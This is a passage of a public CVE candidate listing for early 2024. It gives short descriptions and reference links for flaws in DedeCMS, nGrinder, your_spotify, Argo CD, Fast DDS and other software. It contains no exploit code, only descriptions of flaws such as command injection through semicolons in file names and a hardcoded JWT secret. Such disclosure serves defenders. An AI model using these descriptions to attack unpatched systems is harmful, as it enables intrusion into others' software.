sensitive values, ensure plugins (especially those that utilize shared secrets) follow best practices to avoid logging parameters that are expected to be sensitive, minimize secrets with `pull_request` events enabled, as this allows users to change pipeline configurations and pull in secrets to steps not typically part of the CI process, make use of the build approval setting, restricting builds from untrusted users, and limit use of shared secrets, as they are less restrictive to access by nature.    MISC:https://github.com/go-vela/worker/commit/e1572743b008e4fbce31ebb1dcd23bf6a1a30297   |   URL:https://github.com/go-vela/worker/commit/e1572743b008e4fbce31ebb1dcd23bf6a1a30297   |   MISC:https://github.com/go-vela/worker/security/advisories/GHSA-pwx5-6wxg-px5h   |   URL:https://github.com/go-vela/worker/security/advisories/GHSA-pwx5-6wxg-px5h    Assigned (20240307)
CVE    2024    28231    Candidate    eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.14.0, 2.13.4, 2.12.3, 2.10.4, and 2.6.8, manipulated DATA Submessage can cause a heap overflow error in the Fast-DDS process, causing the process to be terminated remotely. Additionally, the payload_size in the DATA Submessage packet is declared as uint32_t. When a negative number, such as -1, is input into this variable, it results in an Integer Overflow (for example, -1 gets converted to 0xFFFFFFFF). This eventually leads to a heap-buffer-overflow, causing the program to terminate. Versions 2.14.0, 2.13.4, 2.12.3, 2.10.4, and 2.6.8 contain a fix for this issue.    MISC:https://github.com/eProsima/Fast-DDS/commit/355706386f4af9ce74125eeec3c449b06113112b   |   URL:https://github.com/eProsima/Fast-DDS/commit/355706386f4af9ce74125eeec3c449b06113112b   |   MISC:https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-9m2j-qw67-ph4w   |   URL:https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-9m2j-qw67-ph4w    Assigned (20240307)
CVE    2024    28230    Candidate    In JetBrains YouTrack before 2024.1.25893, attaching/detaching a workflow to a project was possible without project admin permissions.    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240307)
CVE    2024    2823    Candidate    A vulnerability has been found in DedeCMS 5.7 and classified as problematic. This vulnerability affects unknown code of the file /src/dede/mda_main.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257710 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257710   |   MISC:VDB-257710 | DedeCMS mda_main.php cross-site request forgery   |   URL:https://vuldb.com/?id.257710   |   MISC:https://github.com/lcg-22266/cms/blob/main/1.md   |   URL:https://github.com/lcg-22266/cms/blob/main/1.md    Assigned (20240322)
CVE    2024    28229    Candidate    In JetBrains YouTrack before 2024.1.25893, a user without appropriate permissions could restore issues and articles.    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240307)
CVE    2024    28228    Candidate    In JetBrains YouTrack before 2024.1.25893, creation of comments on behalf of an arbitrary user in HelpDesk was possible.    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240307)
CVE    2024    28222    Candidate    In Veritas NetBackup before 8.1.2 and NetBackup Appliance before 3.1.2, the BPCD process inadequately validates the file path, allowing an unauthenticated attacker to upload and execute a custom file.    MISC:https://www.veritas.com/content/support/en_US/security/VTS23-010    Assigned (20240307)
CVE    2024    2822    Candidate    A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/vote_edit.php. The manipulation of the argument aid leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257709 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257709   |   MISC:VDB-257709 | DedeCMS vote_edit.php cross-site request forgery   |   URL:https://vuldb.com/?id.257709   |   MISC:https://github.com/E1CHO/demo/blob/main/29.pdf   |   URL:https://github.com/E1CHO/demo/blob/main/29.pdf    Assigned (20240322)
CVE    2024    28216    Candidate    nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28216.html    Assigned (20240307)
CVE    2024    28215    Candidate    nGrinder before 3.5.9 allows an attacker to create or update webhook configuration due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28215.html    Assigned (20240307)
CVE    2024    28214    Candidate    nGrinder before 3.5.9 allows setting a delay without limitation, which could cause Denial of Service by a remote attacker.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28214.html    Assigned (20240307)
CVE    2024    28213    Candidate    nGrinder before 3.5.9 accepts serialized Java objects from unauthenticated users, which could allow a remote attacker to execute arbitrary code via unsafe Java object deserialization.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28213.html    Assigned (20240307)
CVE    2024    28212    Candidate    nGrinder before 3.5.9 uses an old version of SnakeYAML, which could allow a remote attacker to execute arbitrary code via unsafe deserialization.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28212.html    Assigned (20240307)
CVE    2024    28211    Candidate    nGrinder before 3.5.9 allows connection to a malicious JMX/RMI server by default, which could lead to arbitrary code execution via the RMI registry by a remote attacker.    CONFIRM:NAVER Security Advisory   |   URL:https://cve.naver.com/detail/cve-2024-28211.html    Assigned (20240307)
CVE    2024    2821    Candidate    A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. Affected by this issue is some unknown functionality of the file /src/dede/friendlink_edit.php. The manipulation of the argument id leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257708 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257708   |   MISC:VDB-257708 | DedeCMS friendlink_edit.php cross-site request forgery   |   URL:https://vuldb.com/?id.257708   |   MISC:https://github.com/E1CHO/demo/blob/main/27.pdf   |   URL:https://github.com/E1CHO/demo/blob/main/27.pdf    Assigned (20240322)
CVE    2024    2820    Candidate    A vulnerability classified as problematic was found in DedeCMS 5.7. Affected by this vulnerability is an unknown functionality of the file /src/dede/baidunews.php. The manipulation of the argument filename leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257707 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257707   |   MISC:VDB-257707 | DedeCMS baidunews.php cross-site request forgery   |   URL:https://vuldb.com/?id.257707   |   MISC:https://github.com/E1CHO/demo/blob/main/26.pdf   |   URL:https://github.com/E1CHO/demo/blob/main/26.pdf    Assigned (20240322)
CVE    2024    28199    Candidate    phlex is an open source framework for building object-oriented views in Ruby. There is a potential cross-site scripting (XSS) vulnerability that can be exploited via maliciously crafted user data. This was due to improper case-sensitivity in the code that was meant to prevent these attacks. If you render an `<a>` tag with an `href` attribute set to a user-provided link, that link could potentially execute JavaScript when clicked by another user. If you splat user-provided attributes when rendering any HTML tag, malicious event attributes could be included in the output, executing JavaScript when the events are triggered by another user. Patches are available on RubyGems for all 1.x minor versions. Users are advised to upgrade. Users unable to upgrade should consider configuring a content security policy that does not allow `unsafe-inline`.    MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy   |   URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy   |   MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline   |   URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline   |   MISC:https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1   |   URL:https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1   |   MISC:https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g   |   URL:https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g    Assigned (20240306)
CVE    2024    28198    Candidate    OpenOlat is an open source web-based e-learning platform for teaching, learning, assessment and communication. By manually manipulating HTTP requests when using the draw.io integration, it is possible to read arbitrary files as the configured system user and to perform SSRF. The problem is fixed in version 18.1.6 and 18.2.2. It is advised to upgrade to the latest version of 18.1.x or 18.2.x. Users unable to upgrade may work around this issue by disabling the Draw.io module or the entire REST API, which will secure the system.    MISC:https://github.com/OpenOLAT/OpenOLAT/commit/23e6212e9412c3b099436159b8c8935321c91872   |   URL:https://github.com/OpenOLAT/OpenOLAT/commit/23e6212e9412c3b099436159b8c8935321c91872   |   MISC:https://github.com/OpenOLAT/OpenOLAT/security/advisories/GHSA-pqvm-h9mg-434c   |   URL:https://github.com/OpenOLAT/OpenOLAT/security/advisories/GHSA-pqvm-h9mg-434c   |   MISC:https://track.frentix.com/issue/OO-7553/XXE-injection-in-draw.io-endpoint   |   URL:https://track.frentix.com/issue/OO-7553/XXE-injection-in-draw.io-endpoint    Assigned (20240306)
CVE    2024    28197    Candidate    Zitadel is an open source identity management system. Zitadel uses a cookie to identify the user agent (browser) and its user sessions. Although the cookie was handled according to best practices, it was accessible on subdomains of the ZITADEL instance. An attacker could take advantage of this and provide a malicious link hosted on the subdomain to the user to gain access to the victim’s account in certain scenarios. A possible victim would need to login through the malicious link for this exploit to work. If the possible victim already had the cookie present, the attack would not succeed. The attack would further only be possible if there was an initial vulnerability on the subdomain. This could either be the attacker being able to control DNS or a XSS vulnerability in an application hosted on a subdomain. Versions 2.46.0, 2.45.1, and 2.44.3 have been patched. Zitadel recommends upgrading to the latest versions available in due course. Note that applying the patch will invalidate the current cookie and thus users will need to start a new session and existing sessions (user selection) will be empty. For self-hosted environments unable to upgrade to a patched version, prevent setting the following cookie name on subdomains of your Zitadel instance (e.g. within your WAF): `__Secure-zitadel-useragent`.    MISC:https://github.com/zitadel/zitadel/security/advisories/GHSA-mq4x-r2w3-j7mr   |   URL:https://github.com/zitadel/zitadel/security/advisories/GHSA-mq4x-r2w3-j7mr    Assigned (20240306)
CVE    2024    28196    Candidate    your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version < 1.9.0 does not prevent other pages from displaying it in an iframe and is thus vulnerable to clickjacking. Clickjacking can be used to trick an existing user of YourSpotify to trigger actions, such as allowing signup of other users or deleting the current user account. Clickjacking works by opening the target application in an invisible iframe on an attacker-controlled site and luring a victim to visit the attacker page and interacting with it. By positioning elements over the invisible iframe, a victim can be tricked into triggering malicious or destructive actions in the invisible iframe, while they think they interact with a totally different site altogether. When a victim visits an attacker-controlled site while they are logged into YourSpotify, they can be tricked into performing actions on their YourSpotify instance without their knowledge. These actions include allowing signup of other users or deleting the current user account, resulting in a high impact to the integrity of YourSpotify. This issue has been addressed in version 1.9.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-m5x2-6hjm-cggq   |   URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-m5x2-6hjm-cggq    Assigned (20240306)
CVE    2024    28195    Candidate    your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify versions < 1.9.0 do not protect the API and login flow against Cross-Site Request Forgery (CSRF). Attackers can use this to execute CSRF attacks on victims, allowing them to retrieve, modify or delete data on the affected YourSpotify instance. Using repeated CSRF attacks, it is also possible to create a new user on the victim instance and promote the new user to instance administrator if a legitimate administrator visits a website prepared by an attacker. Note: Real-world exploitability of this vulnerability depends on the browser version and browser settings in use by the victim. This issue has been addressed in version 1.9.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Yooooomi/your_spotify/commit/c3ae87673910c9903bb53088c8b71ed2c9aa54e4   |   URL:https://github.com/Yooooomi/your_spotify/commit/c3ae87673910c9903bb53088c8b71ed2c9aa54e4   |   MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-hfgf-99p3-6fjj   |   URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-hfgf-99p3-6fjj    Assigned (20240306)
CVE    2024    28194    Candidate    your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify versions < 1.8.0 use a hardcoded JSON Web Token (JWT) secret to sign authentication tokens. Attackers can use this well-known value to forge valid authentication tokens for arbitrary users. This vulnerability allows attackers to bypass authentication and authenticate as arbitrary YourSpotify users, including admin users. This issue has been addressed in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-gvcr-g265-j827   |   URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-gvcr-g265-j827    Assigned (20240306)
CVE    2024    28193    Candidate    your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version <1.8.0 allows users to create a public token in the settings, which can be used to provide guest-level access to the information of that specific user in YourSpotify. The /me API endpoint discloses Spotify API access and refresh tokens to guest users. Attackers with access to a public token for guest access to YourSpotify can therefore obtain access to Spotify API tokens of YourSpotify users. As a consequence, attackers may extract profile information, information about listening habits, playlists and other information from the corresponding Spotify profile. In addition, the attacker can pause and resume playback in the Spotify app at will. This issue has been resolved in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this issue.    MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-3782-758f-mj85   |   URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-3782-758f-mj85    Assigned (20240306)
CVE    2024    28192    Candidate    your_spotify is an open source, self hosted Spotify tracking dashboard. YourSpotify version <1.8.0 is vulnerable to NoSQL injection in the public access token processing logic. Attackers can fully bypass the public token authentication mechanism, regardless of whether a public token has been generated before or not, without any user interaction or prerequisite knowledge. This issue has been addressed in version 1.8.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-c8wf-wcjc-2pvm   |   URL:https://github.com/Yooooomi/your_spotify/security/advisories/GHSA-c8wf-wcjc-2pvm    Assigned (20240306)
CVE    2024    28187    Candidate    SOY CMS is an open source CMS (content management system) that allows you to build blogs and online shops. SOY CMS versions prior to 3.14.2 are vulnerable to an OS Command Injection vulnerability within the file upload feature when accessed by an administrator. The vulnerability enables the execution of arbitrary OS commands through specially crafted file names containing a semicolon, affecting the jpegoptim functionality. This vulnerability has been patched in version 3.14.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/inunosinsi/soycms/commit/9b0e452f628df28dec69cd72b6b55db21066cbf8   |   URL:https://github.com/inunosinsi/soycms/commit/9b0e452f628df28dec69cd72b6b55db21066cbf8   |   MISC:https://github.com/inunosinsi/soycms/security/advisories/GHSA-qg3q-hfgc-5jmm   |   URL:https://github.com/inunosinsi/soycms/security/advisories/GHSA-qg3q-hfgc-5jmm    Assigned (20240306)
CVE    2024    28186    Candidate    FreeScout is an open source help desk and shared inbox built with PHP. A vulnerability has been identified in the Free Scout Application, which exposes SMTP server credentials used by an organization in the application to users of the application. This issue arises from the application storing complete stack traces of exceptions in its database. The sensitive information is then inadvertently disclosed to users via the `/conversation/ajax-html/send_log?folder_id=&thread_id={id}` endpoint. The stack trace reveals the values of parameters, including the username and password, passed to the `Swift_Transport_Esmtp_Auth_LoginAuthenticator->authenticate()` function. Exploiting this vulnerability allows an attacker to gain unauthorized access to SMTP server credentials. With this sensitive information in hand, the attacker can potentially send unauthorized emails from the compromised SMTP server, posing a severe threat to the confidentiality and integrity of email communications. This could lead to targeted attacks on both the application users and the organization itself, compromising the security of email exchange servers. This issue has been addressed in version 1.8.124. Users are advised to upgrade. Users unable to upgrade should adopt the following measures: 1. Avoid Storing Complete Stack Traces, 2. Implement redaction mechanisms to filter and exclude sensitive information, and 3. Review and enhance the application's logging practices.    MISC:https://github.com/freescout-helpdesk/freescout/commit/33639a89554998dcac645613130a27ac7872605e   |   URL:https://github.com/freescout-helpdesk/freescout/commit/33639a89554998dcac645613130a27ac7872605e   |   MISC:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7wcq-2qmv-mvcm   |   URL:https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-7wcq-2qmv-mvcm    Assigned (20240306)
CVE    2024    28184    Candidate    WeasyPrint helps web developers to create PDF documents. Since version 61.0, there's a vulnerability which allows attaching content of arbitrary files and URLs to a generated PDF document, even if `url_fetcher` is configured to prevent access to files and URLs. This vulnerability has been patched in version 61.2.    FEDORA:FEDORA-2024-baa87269ba   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLQZMOEDY72TS43HDXOBVID2VYCTWIH6/   |   MISC:https://github.com/Kozea/WeasyPrint/commit/734ee8e2dc84ff3090682f3abff056d0907c8598   |   URL:https://github.com/Kozea/WeasyPrint/commit/734ee8e2dc84ff3090682f3abff056d0907c8598   |   MISC:https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-35jj-wx47-4w8r   |   URL:https://github.com/Kozea/WeasyPrint/security/advisories/GHSA-35jj-wx47-4w8r    Assigned (20240306)
CVE    2024    28183    Candidate    ESP-IDF is the development framework for Espressif SoCs supported on Windows, Linux and macOS. A Time-of-Check to Time-of-Use (TOCTOU) vulnerability was discovered in the implementation of the ESP-IDF bootloader which could allow an attacker with physical access to flash of the device to bypass anti-rollback protection. Anti-rollback prevents rollback to application with security version lower than one programmed in eFuse of chip. This attack can allow to boot past (passive) application partition having lower security version of the same device even in the presence of the flash encryption scheme. The attack requires carefully modifying the flash contents after the anti-rollback checks have been performed by the bootloader (before loading the application). The vulnerability is fixed in 4.4.7 and 5.2.1.    MISC:https://github.com/espressif/esp-idf/commit/3305cb4d235182067936f8e940e6db174e25b4b2   |   URL:https://github.com/espressif/esp-idf/commit/3305cb4d235182067936f8e940e6db174e25b4b2   |   MISC:https://github.com/espressif/esp-idf/commit/4c95aa445d4e84f01f86b6f3a552aa299276abf3   |   URL:https://github.com/espressif/esp-idf/commit/4c95aa445d4e84f01f86b6f3a552aa299276abf3   |   MISC:https://github.com/espressif/esp-idf/commit/534e3ad1fa68526a5f989fb2163856d6b7cd2c87   |   URL:https://github.com/espressif/esp-idf/commit/534e3ad1fa68526a5f989fb2163856d6b7cd2c87   |   MISC:https://github.com/espressif/esp-idf/commit/7003f1ef0dffc73c34eb153d1b0710babb078149   |   URL:https://github.com/espressif/esp-idf/commit/7003f1ef0dffc73c34eb153d1b0710babb078149   |   MISC:https://github.com/espressif/esp-idf/commit/b2cdc0678965790f49afeb6e6b0737cd24433a05   |   URL:https://github.com/espressif/esp-idf/commit/b2cdc0678965790f49afeb6e6b0737cd24433a05   |   MISC:https://github.com/espressif/esp-idf/commit/c33b9e1426121ce8cccf1a94241740be9cff68de   |   URL:https://github.com/espressif/esp-idf/commit/c33b9e1426121ce8cccf1a94241740be9cff68de   |   MISC:https://github.com/espressif/esp-idf/commit/f327ddf6adab0c28d395975785727b2feef57803   |   URL:https://github.com/espressif/esp-idf/commit/f327ddf6adab0c28d395975785727b2feef57803   |   MISC:https://github.com/espressif/esp-idf/security/advisories/GHSA-22x6-3756-pfp8   |   URL:https://github.com/espressif/esp-idf/security/advisories/GHSA-22x6-3756-pfp8    Assigned (20240306)
CVE    2024    28181    Candidate    turbo_boost-commands is a set of commands to help you build robust reactive applications with Rails & Hotwire. TurboBoost Commands has existing protections in place to guarantee that only public methods on Command classes can be invoked; however, the existing checks aren't as robust as they should be. It's possible for a sophisticated attacker to invoke more methods than should be permitted depending on the strictness of authorization checks that individual applications enforce. Being able to call some of these methods can have security implications. Commands verify that the class must be a `Command` and that the method requested is defined as a public method; however, this isn't robust enough to guard against all unwanted code execution. The library should more strictly enforce which methods are considered safe before allowing them to be executed. This issue has been addressed in versions 0.1.3, and 0.2.2. Users are advised to upgrade. Users unable to upgrade should see the repository GHSA for workaround advice.    MISC:https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba   |   URL:https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba   |   MISC:https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75   |   URL:https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75    Assigned (20240306)
CVE    2024    28180    Candidate    Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.    FEDORA:FEDORA-2024-453ee0b3b9   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJDO5VSIAOGT2WP63AXAAWNRSVJCNCRH/   |   FEDORA:FEDORA-2024-560a7aca85   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXKGNCRU7OTM5AHC7YIYBNOWI742PRMY/   |   MISC:https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298   |   URL:https://github.com/go-jose/go-jose/commit/0dd4dd541c665fb292d664f77604ba694726f298   |   MISC:https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a   |   URL:https://github.com/go-jose/go-jose/commit/add6a284ea0f844fd6628cba637be5451fe4b28a   |   MISC:https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502   |   URL:https://github.com/go-jose/go-jose/commit/f4c051a0653d78199a053892f7619ebf96339502   |   MISC:https://github.com/go-jose/go-jose/security/advisories/GHSA-c5q2-7r4c-mv6g   |   URL:https://github.com/go-jose/go-jose/security/advisories/GHSA-c5q2-7r4c-mv6g    Assigned (20240306)
CVE    2024    28179    Candidate    Jupyter Server Proxy allows users to run arbitrary external processes alongside their Jupyter notebook servers and provides authenticated web access. Prior to versions 3.2.3 and 4.1.1, Jupyter Server Proxy did not check user authentication appropriately when proxying websockets, allowing unauthenticated access to anyone who had network access to the Jupyter server endpoint. This vulnerability can allow unauthenticated remote access to any websocket endpoint set up to be accessible via Jupyter Server Proxy. In many cases, this leads to remote unauthenticated arbitrary code execution, due to how affected instances use websockets. The websocket endpoints exposed by `jupyter_server` itself are not affected. Projects that do not rely on websockets are also not affected. Versions 3.2.3 and 4.1.1 contain a fix for this issue.    MISC:https://github.com/jupyterhub/jupyter-server-proxy/blob/9b624c4d9507176334b46a85d94a4aa3bcd29bed/jupyter_server_proxy/handlers.py#L433   |   URL:https://github.com/jupyterhub/jupyter-server-proxy/blob/9b624c4d9507176334b46a85d94a4aa3bcd29bed/jupyter_server_proxy/handlers.py#L433   |   MISC:https://github.com/jupyterhub/jupyter-server-proxy/commit/764e499f61a87641916a7a427d4c4b1ac3f321a9   |   URL:https://github.com/jupyterhub/jupyter-server-proxy/commit/764e499f61a87641916a7a427d4c4b1ac3f321a9   |   MISC:https://github.com/jupyterhub/jupyter-server-proxy/commit/bead903b7c0354b6efd8b4cde94b89afab653e03   |   URL:https://github.com/jupyterhub/jupyter-server-proxy/commit/bead903b7c0354b6efd8b4cde94b89afab653e03   |   MISC:https://github.com/jupyterhub/jupyter-server-proxy/security/advisories/GHSA-w3vc-fx9p-wp4v   |   URL:https://github.com/jupyterhub/jupyter-server-proxy/security/advisories/GHSA-w3vc-fx9p-wp4v    Assigned (20240306)
CVE    2024    28176    Candidate    jose is a JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume an unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5.    FEDORA:FEDORA-2024-453ee0b3b9   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XJDO5VSIAOGT2WP63AXAAWNRSVJCNCRH/   |   FEDORA:FEDORA-2024-560a7aca85   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXKGNCRU7OTM5AHC7YIYBNOWI742PRMY/   |   MISC:https://github.com/panva/jose/commit/02a65794f7873cdaf12e81e80ad076fcdc4a9314   |   URL:https://github.com/panva/jose/commit/02a65794f7873cdaf12e81e80ad076fcdc4a9314   |   MISC:https://github.com/panva/jose/commit/1b91d88d2f8233f3477a5f4579aa5f8057b2ee8b   |   URL:https://github.com/panva/jose/commit/1b91d88d2f8233f3477a5f4579aa5f8057b2ee8b   |   MISC:https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q   |   URL:https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q    Assigned (20240306)
CVE    2024    28175    Candidate    Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Due to the improper URL protocols filtering of links specified in the `link.argocd.argoproj.io` annotations in the application summary component, an attacker can achieve cross-site scripting with elevated permissions. All unpatched versions of Argo CD starting with v1.0.0 are vulnerable to a cross-site scripting (XSS) bug allowing a malicious user to inject a javascript: link in the UI. When clicked by a victim user, the script will execute with the victim's permissions (up to and including admin). This vulnerability allows an attacker to perform arbitrary actions on behalf of the victim via the API, such as creating, modifying, and deleting Kubernetes resources. A patch for this vulnerability has been released in Argo CD versions v2.10.3, v2.9.8, and v2.8.12. There are no completely-safe workarounds besides upgrading. The safest alternative, if upgrading is not possible, would be to create a Kubernetes admission controller to reject any resources with an annotation starting with link.argocd.argoproj.io or reject the resource if the value uses an improper URL protocol. This validation will need to be applied in all clusters managed by ArgoCD.    MISC:https://github.com/argoproj/argo-cd/commit/479b5544b57dc9ef767d49f7003f39602c480b71   |   URL:https://github.com/argoproj/argo-cd/commit/479b5544b57dc9ef767d49f7003f39602c480b71   |   MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-jwv5-8mqv-g387   |   URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-jwv5-8mqv-g387    Assigned (20240306)
CVE    2024    28174    Candidate    In JetBrains TeamCity before 2023.11.4 presigned URL generation requests in S3 Artifact Storage plugin were authorized improperly    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240306)
CVE    2024    28173    Candidate    In JetBrains TeamCity between 2023.11 and 2023.11.4 custom build parameters of the "password" type could be disclosed    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240306)
CVE    2024    28171    Candidate    It is possible to perform a path traversal attack and write outside of the intended directory. If a file name is specified that already exists on the file system, then the original file will be overwritten.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    2817    Candidate    A vulnerability, which was classified as problematic, has been found in Tenda AC15 15.03.05.18. Affected by this issue is the function fromSysToolRestoreSet of the file /goform/SysToolRestoreSet. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257672 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257672   |   MISC:VDB-257672 | Tenda AC15 SysToolRestoreSet fromSysToolRestoreSet cross-site request forgery   |   URL:https://vuldb.com/?id.257672   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolRestoreSet.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC15/V15.03.05.18/fromSysToolRestoreSet.md    Assigned (20240321)
CVE    2024    28163    Candidate    Under certain conditions, Support Web Pages of SAP NetWeaver Process Integration (PI) - versions 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.    MISC:https://me.sap.com/notes/3434192   |   URL:https://me.sap.com/notes/3434192   |   MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364   |   URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364    Assigned (20240306)
CVE    2024    28162    Candidate    In Jenkins Delphix Plugin 3.0.1 through 3.1.0 (both inclusive) a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections fails to take effect until Jenkins is restarted when switching from disabled validation to enabled validation.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3330    Assigned (20240305)
CVE    2024    28161    Candidate    In Jenkins Delphix Plugin 3.0.1, a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections is disabled by default.    MISC:Jenkins Security Advisory 2024-03-06   |   URL:https://www.jenkins.io/security/advisory/2024-03-06/#SECURITY-3215    Assigned (20240305)
